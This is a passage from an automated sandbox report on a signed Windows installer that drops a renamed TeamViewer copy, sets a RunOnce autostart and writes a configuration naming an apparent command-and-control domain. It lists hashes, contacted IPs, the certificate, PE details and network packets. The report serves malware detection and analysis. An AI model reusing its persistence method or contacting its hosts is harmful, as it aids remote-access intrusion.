                                                                                                            http://master13.teamviewer.com/dout.aspx?s=42047224&p=10000001&client=DynGate&data=FyQS6wChtjSytzoeqUniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmp, UniPrint.exe, 00000005.00000003.713565888.000000000576A000.00000004.00000001.sdmp, UniPrint.exe, 00000005.00000003.713161991.00000000057D0000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              http://www.teamviewer.com/ja/licensing/commercialuse.aspxUniPrint.exe, 00000005.00000002.1074572782.0000000002A4C000.00000004.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                https://www.teamviewer.com/licensing/order.aspx?lng=jawogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drfalse
                                                                                                                  		high

                                                                                                                  Contacted IPs

                                                                                                                  • No. of IPs < 25%
                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                  • 75% < No. of IPs

                                                                                                                  Public

                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                  188.172.235.146
                                                                                                                  		unknownAustria
                                                                                                                  		42473AS-ANEXIAANEXIAInternetdienstleistungsGmbHATfalse
                                                                                                                  185.188.32.23
                                                                                                                  		master13.teamviewer.comGermany
                                                                                                                  		43304TEAMVIEWER-ASDEfalse
                                                                                                                  45.153.241.148
                                                                                                                  		widolapsed.infoGermany
                                                                                                                  		30823COMBAHTONcombahtonGmbHDEfalse

                                                                                                                  Private

                                                                                                                  IP
                                                                                                                  192.168.2.1
                                                                                                                  127.0.0.1

                                                                                                                  General Information

                                                                                                                  Joe Sandbox Version:33.0.0 White Diamond
                                                                                                                  Analysis ID:483790
                                                                                                                  Start date:15.09.2021
                                                                                                                  Start time:14:00:47
                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                  Overall analysis duration:0h 15m 11s
                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                  Report type:light
                                                                                                                  Sample file name:wogZe27GBB.exe
                                                                                                                  Cookbook file name:default.jbs
                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                  Run name:Run with higher sleep bypass
                                                                                                                  Number of analysed new started processes analysed:23
                                                                                                                  Number of new started drivers analysed:0
                                                                                                                  Number of existing processes analysed:0
                                                                                                                  Number of existing drivers analysed:0
                                                                                                                  Number of injected processes analysed:0
                                                                                                                  Technologies:
                                                                                                                  • HCA enabled
                                                                                                                  • EGA enabled
                                                                                                                  • HDC enabled
                                                                                                                  • AMSI enabled
                                                                                                                  Analysis Mode:default
                                                                                                                  Analysis stop reason:Timeout
                                                                                                                  Detection:MAL
                                                                                                                  Classification:mal72.evad.winEXE@13/7@4/5
                                                                                                                  EGA Information:Failed
                                                                                                                  HDC Information:
                                                                                                                  • Successful, ratio: 28.3% (good quality ratio 27.6%)
                                                                                                                  • Quality average: 83.4%
                                                                                                                  • Quality standard deviation: 24.3%
                                                                                                                  HCA Information:Failed
                                                                                                                  Cookbook Comments:
                                                                                                                  • Adjust boot time
                                                                                                                  • Enable AMSI
                                                                                                                  • Sleeps bigger than 120000ms are automatically reduced to 1000ms
                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                  Warnings:
                                                                                                                  Show All
                                                                                                                  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, wuapihost.exe
                                                                                                                  • TCP Packets have been reduced to 100
                                                                                                                  • Excluded IPs from analysis (whitelisted): 92.122.145.220, 20.82.209.104, 20.54.110.249, 40.112.88.60, 23.216.77.208, 23.216.77.209, 20.50.102.62
                                                                                                                  • Excluded domains from analysis (whitelisted): displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, arc.msn.com, iris-de-ppe-azsc-neu.northeurope.cloudapp.azure.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                  Simulations

                                                                                                                  Behavior and APIs

                                                                                                                  TimeTypeDescription
                                                                                                                  14:02:08AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce UniPrint.exe "C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe" f
                                                                                                                  14:02:16AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce UniPrint.exe "C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe" f

                                                                                                                  Joe Sandbox View / Context

                                                                                                                  IPs

                                                                                                                  No context

                                                                                                                  Domains

                                                                                                                  No context

                                                                                                                  ASN

                                                                                                                  No context

                                                                                                                  JA3 Fingerprints

                                                                                                                  No context

                                                                                                                  Dropped Files

                                                                                                                  No context

                                                                                                                  Created / dropped Files

                                                                                                                  C:\Users\user\AppData\Local\Temp\nsrC1CA.tmp
                                                                                                                  Process:C:\Users\user\Desktop\wogZe27GBB.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):5131242
                                                                                                                  Entropy (8bit):6.736055511669049
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:98304:xmfzCAW6LcJjdgHPmMogx1WZRkPapqj+ZG/D+AKbS5CjH:xmfzCgEqHuMogsRkyq0X
                                                                                                                  MD5:1E6978657EEB4A9F6B4E84C62B228EE4
                                                                                                                  SHA1:496A37AE9417163CFF53FBFEA9BA5BD1AC6BAFAE
                                                                                                                  SHA-256:0FFB6906EA4C7B9A2E97FE0B8A205E00C8E5B1A7E03038627B1E6681CC66B986
                                                                                                                  SHA-512:412332869C2B7C90A5409338EBBFF96786AEADDAA54A0BA1F0D96035E929D7DFB773A2E02F8C588F15739A3CE0211DAE6074EEFE94AE18F85B5C4FA2C6BCBC6B
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: ........,.......,.......D.......$.......b...................................................................................................................................................................................................................................................J...V.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dll
                                                                                                                  Process:C:\Users\user\Desktop\wogZe27GBB.exe
                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):73696
                                                                                                                  Entropy (8bit):6.629217484187715
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:768:DWNCi7sBIpvYqSRw6zhD16poDVDREv1Mme9MfPGz49jjZLq00RKi5jYjfLhs8WhU:A6BmmPX6mDVdme9uGzWH10I+Uje8WhU
                                                                                                                  MD5:AC34AB95CBC23CDF332BEA2CC0FFBF35
                                                                                                                  SHA1:43ED3DD9863791294064D2F85F3DF3F08D572037
                                                                                                                  SHA-256:4BA3BD623A9919A357708DA57BBBBC978706DAD8D57DA64E89C780147843C7CE
                                                                                                                  SHA-512:3740DFD9F8ED967953C6A3522D66B5E547D3BB2A4C618FD667A817F6283E4353E2B81E994938E989AEA89BFD7A23E41309647EDCD1F6F0A075436E5B1FEE7B0A
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Metadefender, Detection: 6%, Browse
                                                                                                                  • Antivirus: ReversingLabs, Detection: 51%
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N.@....................../...........................................................Rich....................PE..L...QQ.a...........!.........L............................................... ......-s....@.........................`...D.......,...................................0...................................................0............................text............................... ..`.rdata...,..........................@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                  C:\Users\user\AppData\Roaming\ViberPC\Icons\TeamViewer.ini
                                                                                                                  Process:C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                                  File Type:data
                                                                                                                  Category:modified
                                                                                                                  Size (bytes):226
                                                                                                                  Entropy (8bit):3.2302371579115574
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:y3ADAeYlA3m7D5KTLp3cQYdlRAeYlA3m7D5KLp3gk+AeYlA3m7D5KLp3gkp:E7NQalM7NM397NM3p
                                                                                                                  MD5:D391CD3A0498B19D1DC083B30D010F4F
                                                                                                                  SHA1:8BAFA1893DA6E63EC995E97C436E0E88BBC6E866
                                                                                                                  SHA-256:5DD9E60CE43560D86998187E42C1B427FA034B126B90F3FFECB7282169F52D97
                                                                                                                  SHA-512:0279F2164530EBDB9694E00CA2921BB1A9DE424E65435ABCB58FB38AFBA6A94CDAA4A6747E9EA541DED19E9B1C1D15DA00632A7AC5E1D1DED1B20A71A809B1B6
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: h.d.n.=.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o.....h.p.n.=./.B.8.C.6.3.1.A.8./.....h.s.n.=.1.....h.t.=.3.6.....r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.
                                                                                                                  C:\Users\user\AppData\Roaming\ViberPC\Icons\Teamviewer_Resource_ja.dll
                                                                                                                  Process:C:\Users\user\Desktop\wogZe27GBB.exe
                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):607528
                                                                                                                  Entropy (8bit):6.564133582926054
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6144:r5hmfFy7ZJ0uUCAD06v7JlHZctms+2lifZ0iMe8d6YySkYQKMDqtAu3NhgGy6wSP:Vhmf4ACAzneosEi6YhvAuUGyUrNJbL
                                                                                                                  MD5:554EE592B125CFDF81B376B5C24AA61C
                                                                                                                  SHA1:666D2C04171246734575D4453289AA2D9AF93B97
                                                                                                                  SHA-256:B296EF421D5B7F569E623D41A42D87A064C4358CFA89A192988F854929E3ABD1
                                                                                                                  SHA-512:6C3111BF9D26929D426797EBDD8D804B34E2E8F593BF488298E70964538F2DA3D971C4ED3C3237C829AE7DE4FDB8D4316D84F153E93E3788808547A8538B73F5
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........-T.L:..L:..L:...F..L:...B..L:.Rich.L:.........PE..L.....LK...........!.........................................................0.......................................................................0..(.... .......................................................................................rsrc...............................@..@.reloc....... ....... ..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                                  Process:C:\Users\user\Desktop\wogZe27GBB.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4375848
                                                                                                                  Entropy (8bit):6.621789733656387
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:98304:6jdgHPmMogx1WZRkPapqj+ZG/D+AKbS5m:4qHuMogsRkyq0N
                                                                                                                  MD5:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                                  SHA1:A3A7498F02BAB188B3944382BBA4D016D63607D1
                                                                                                                  SHA-256:D2CDCA8EFA27089D3DEAD0CCEAFBE470B3815C9C2A362C007D1F516E5379AC92
                                                                                                                  SHA-512:412B42C540A9FE41709453D725B7A1E888849326A70A411E645F29240D730D69EBCF4B26E6870D33E0A395C612470BD00064025D22B0C6BCD211242E8EF6CEA6
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............o...o...o.......o.......o.....2.o.....q.o.F.2...o...n...o.......o.F.0...o.......o.......o.......o.Rich..o.................PE..L.....LK..................3.........F........03...@...........................K......ZC.......................................@...... K.8`............B.(...........pe4......................x:.....`x:.@............03. ............................text.....3.......3................. ..`.rdata..&....03.......3.............@..@.data...h....P@.."...*@.............@....tls..........K......LB.............@....rsrc...8`... K..b...NB.............@..@........................................................................................................................................................................................................................................................................................................
                                                                                                                  C:\Users\user\AppData\Roaming\ViberPC\Icons\vpn.cab
                                                                                                                  Process:C:\Users\user\Desktop\wogZe27GBB.exe
                                                                                                                  File Type:Microsoft Cabinet archive data, 71196 bytes, 8 files
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):71196
                                                                                                                  Entropy (8bit):7.996182851828797
                                                                                                                  Encrypted:true
                                                                                                                  SSDEEP:1536:qUTRtkxXFuG1DKNYCqRBiFxMZPQCJh/njgG5+jC5hA101pNO0:qUNtax12mCqRBiyQG/jgG5+j2NO0
                                                                                                                  MD5:8A84AA1B9F20DC194947D7AC592D818E
                                                                                                                  SHA1:4A77AB0D59F39BF600BB89D9121446F6AA2D139B
                                                                                                                  SHA-256:8A740BE5D92B734E77B210354988DFD49F31C49814240513CF4B0353A8CE6DFB
                                                                                                                  SHA-512:B3F90ADB48861CD775F15E75885C81A130D62DFE429A5833FA1CE0BC203EEA15BD8A7306618B1F4D27810493300400C8B149D58032F90F0E9D93B04F9B8F1050
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: MSCF............,...............JA..H........)........k<'b..64\teamviewervpn.cat......)....k<'b..64\TeamViewerVPN.inf.(....>....k<'b..64\teamviewervpn.sys..<........k<&b..64\install.exe..)........k<'b..86\teamviewervpn.cat......-....k<'b..86\TeamViewerVPN.inf..b...B....k<'b..86\teamviewervpn.sys...........k<&b..86\install.exe.h.t"X<..[.....`.....@...N.f.|..U.......$."..L.F..4....|....U$Q/...%.J).D...@F.......f...9..../@.x;.N..w..2...i1P.....O.....T...T.y...``...;.$.&....@........@..~..\...J.44...:.@....M.....x\.0c|..W...,.|.x..+.P..N.. ..S0@B.;?.(..B..,.%.{.. ....(T.....U.5..=.3'rxci.;....P$..H)...1...h._e..{....Q._..}...K......U.s...._..WRWlS.8.._...D.NI..>.|O<..q...$0.EA*8d...../..=@2q...g_.Hs|`+...`.>U..)X.G*.8.....>..!4 ....}..Ps.a.8.......4.0`._t%...P.qgr..'..~.d..r.....o...w..q........,O.K..Y.8..M.D...p........~.....O?......}@.....>....O..N...c../p..[....._=.~.S....Q..p.O...@.WL....*..}..%1...3a.....u...)..K.Y...s..E;...".e.....X0(IR..'..1...\..6...(i

                                                                                                                  Static File Info

                                                                                                                  General

                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Entropy (8bit):7.995528478877956
                                                                                                                  TrID:
                                                                                                                  • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                                                  • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                  File name:wogZe27GBB.exe
                                                                                                                  File size:1773472
                                                                                                                  MD5:5efc68abd7fec415e34980d95a06a66a
                                                                                                                  SHA1:34b243a0b3e322b8983b528caa5849395360a91d
                                                                                                                  SHA256:0f655a8ac0d7fdc7ac44fdd9799129848faf9c73bfa0e108fd903de439447232
                                                                                                                  SHA512:92aa33884c54bdb2608994b3e4c9b0909b002a38344bae2b4fb01c9a713542cf8a51684a0e3d614730340a995bb918dedb5e4c801ba9e3afa834399f38232079
                                                                                                                  SSDEEP:49152:tMvOJUaiTddo110aPENuUn/vrmUJjefHj9uDd:tHjiTvLn3rb4jkd
                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L.....*J.................\.........

                                                                                                                  File Icon

                                                                                                                  Icon Hash:8282c2d2d2c292a1

                                                                                                                  Static PE Info

                                                                                                                  General

                                                                                                                  Entrypoint:0x40323c
                                                                                                                  Entrypoint Section:.text
                                                                                                                  Digitally signed:true
                                                                                                                  Imagebase:0x400000
                                                                                                                  Subsystem:windows gui
                                                                                                                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                  Time Stamp:0x4A2AE2A2 [Sat Jun 6 21:41:54 2009 UTC]
                                                                                                                  TLS Callbacks:
                                                                                                                  CLR (.Net) Version:
                                                                                                                  OS Version Major:4
                                                                                                                  OS Version Minor:0
                                                                                                                  File Version Major:4
                                                                                                                  File Version Minor:0
                                                                                                                  Subsystem Version Major:4
                                                                                                                  Subsystem Version Minor:0
                                                                                                                  Import Hash:5bd07784f328e868356a895d4ab1a505

                                                                                                                  Authenticode Signature

                                                                                                                  Signature Valid:true
                                                                                                                  Signature Issuer:CN=Sectigo RSA Code Signing CA, O=Sectigo Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                                                  Signature Validation Error:The operation completed successfully
                                                                                                                  Error Number:0
                                                                                                                  Not Before, Not After
                                                                                                                  • 4/21/2021 2:00:00 AM 4/22/2022 1:59:59 AM
                                                                                                                  Subject Chain
                                                                                                                  • CN=Mapping OOO, O=Mapping OOO, L=Saint Petersburg, C=RU
                                                                                                                  Version:3
                                                                                                                  Thumbprint MD5:B9C33DB697628B5EB88B4004D0D6900E
                                                                                                                  Thumbprint SHA-1:D9F41380CE8E8E22E2EF7F558D6D17BB94AA28BE
                                                                                                                  Thumbprint SHA-256:7B5C783B055EB8BA37480ED0E990E3A4631D38531485ECF3875FE213B2FB661D
                                                                                                                  Serial:00A46F9D8784778BAA48167C48BBC56F30

                                                                                                                  Entrypoint Preview

                                                                                                                  Instruction
                                                                                                                  sub esp, 00000180h
                                                                                                                  push ebx
                                                                                                                  push ebp
                                                                                                                  push esi
                                                                                                                  xor ebx, ebx
                                                                                                                  push edi
                                                                                                                  mov dword ptr [esp+18h], ebx
                                                                                                                  mov dword ptr [esp+10h], 00409130h
                                                                                                                  xor esi, esi
                                                                                                                  mov byte ptr [esp+14h], 00000020h
                                                                                                                  call dword ptr [00407030h]
                                                                                                                  push 00008001h
                                                                                                                  call dword ptr [004070B4h]
                                                                                                                  push ebx
                                                                                                                  call dword ptr [0040727Ch]
                                                                                                                  push 00000008h
                                                                                                                  mov dword ptr [00423F58h], eax
                                                                                                                  call 00007F3D8499C76Eh
                                                                                                                  mov dword ptr [00423EA4h], eax
                                                                                                                  push ebx
                                                                                                                  lea eax, dword ptr [esp+34h]
                                                                                                                  push 00000160h
                                                                                                                  push eax
                                                                                                                  push ebx
                                                                                                                  push 0041F458h
                                                                                                                  call dword ptr [00407158h]
                                                                                                                  push 004091B8h
                                                                                                                  push 004236A0h
                                                                                                                  call 00007F3D8499C421h
                                                                                                                  call dword ptr [004070B0h]
                                                                                                                  mov edi, 00429000h
                                                                                                                  push eax
                                                                                                                  push edi
                                                                                                                  call 00007F3D8499C40Fh
                                                                                                                  push ebx
                                                                                                                  call dword ptr [0040710Ch]
                                                                                                                  cmp byte ptr [00429000h], 00000022h
                                                                                                                  mov dword ptr [00423EA0h], eax
                                                                                                                  mov eax, edi
                                                                                                                  jne 00007F3D84999B6Ch
                                                                                                                  mov byte ptr [esp+14h], 00000022h
                                                                                                                  mov eax, 00429001h
                                                                                                                  push dword ptr [esp+14h]
                                                                                                                  push eax
                                                                                                                  call 00007F3D8499BF02h
                                                                                                                  push eax
                                                                                                                  call dword ptr [0040721Ch]
                                                                                                                  mov dword ptr [esp+1Ch], eax
                                                                                                                  jmp 00007F3D84999BC5h
                                                                                                                  cmp cl, 00000020h
                                                                                                                  jne 00007F3D84999B68h
                                                                                                                  inc eax
                                                                                                                  cmp byte ptr [eax], 00000020h
                                                                                                                  je 00007F3D84999B5Ch
                                                                                                                  cmp byte ptr [eax], 00000022h
                                                                                                                  mov byte ptr [eax+eax+00h], 00000000h

                                                                                                                  Rich Headers

                                                                                                                  Programming Language:
                                                                                                                  • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                  Data Directories

                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x440000x13d8.rsrc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x1aefc00x1fe0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                  Sections

                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                  .text0x10000x5a5a0x5c00False0.660453464674data6.41769823686IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                  .rdata0x70000x11900x1200False0.375217013889SysEx File -4.24219639454IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .data0x90000x1af980x400False0.55859375data4.70902740305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                  .ndata0x240000x200000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .rsrc0x440000x13d80x1400False0.2705078125data3.94953591447IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                  Resources

                                                                                                                  NameRVASizeTypeLanguageCountry
                                                                                                                  RT_ICON0x441f00x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                  RT_ICON0x447580x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                  RT_ICON0x44bc00x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                  RT_DIALOG0x44ce80x202dataEnglishUnited States
                                                                                                                  RT_DIALOG0x44ef00xf8dataEnglishUnited States
                                                                                                                  RT_DIALOG0x44fe80xeedataEnglishUnited States
                                                                                                                  RT_GROUP_ICON0x450d80x30dataEnglishUnited States
                                                                                                                  RT_MANIFEST0x451080x2ccXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                                                  Imports

                                                                                                                  DLLImport
                                                                                                                  KERNEL32.DLLCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
                                                                                                                  ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                                                                  COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                  GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                                                                  ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                                  SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                                                                  USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                                                                  VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                                                                  Possible Origin

                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                  EnglishUnited States

                                                                                                                  Network Behavior

                                                                                                                  Network Port Distribution

                                                                                                                  TCP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Sep 15, 2021 14:02:04.126475096 CEST4976180192.168.2.4185.188.32.23
                                                                                                                  Sep 15, 2021 14:02:04.147680998 CEST8049761185.188.32.23192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:04.147789955 CEST4976180192.168.2.4185.188.32.23
                                                                                                                  Sep 15, 2021 14:02:04.163152933 CEST4976180192.168.2.4185.188.32.23
                                                                                                                  Sep 15, 2021 14:02:04.184066057 CEST8049761185.188.32.23192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:04.184166908 CEST4976180192.168.2.4185.188.32.23
                                                                                                                  Sep 15, 2021 14:02:04.214737892 CEST4976180192.168.2.4185.188.32.23
                                                                                                                  Sep 15, 2021 14:02:04.235718012 CEST8049761185.188.32.23192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:04.235829115 CEST4976180192.168.2.4185.188.32.23
                                                                                                                  Sep 15, 2021 14:02:04.241089106 CEST4976180192.168.2.4185.188.32.23
                                                                                                                  Sep 15, 2021 14:02:04.262003899 CEST8049761185.188.32.23192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:04.262037039 CEST8049761185.188.32.23192.168.2.4
